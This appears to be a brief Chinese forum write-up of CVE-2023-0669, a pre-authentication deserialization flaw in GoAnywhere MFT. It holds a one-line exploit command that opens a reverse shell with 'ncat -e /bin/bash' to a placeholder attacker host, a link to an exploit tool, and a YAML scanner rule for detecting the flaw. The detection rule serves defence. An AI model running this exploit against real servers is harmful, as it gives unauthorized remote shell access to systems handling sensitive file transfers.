GoAnywhereMFT
GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。
GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。
影响范围
GoAnywhereMFT小于7.1.2版本
漏洞复现
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://x.x.x.x/ -c “ncat -e /bin/bash yourvps yourport”
- 需要使用-p参数将流量转给burp发包
nc配置监听
- 漏洞利用工具
https://github.com/0xf4n9x/CVE-2023-0669POC
params: []
name: CVE-2023-0669 GoAnywhereMFT反序列化漏洞
set: {}
rules:
- method: GET
path: /goanywhere/lic/accept
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 500 && response.headers["Content-Security-Policy"].contains("*.goanywhere.com")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
请登录后查看回复内容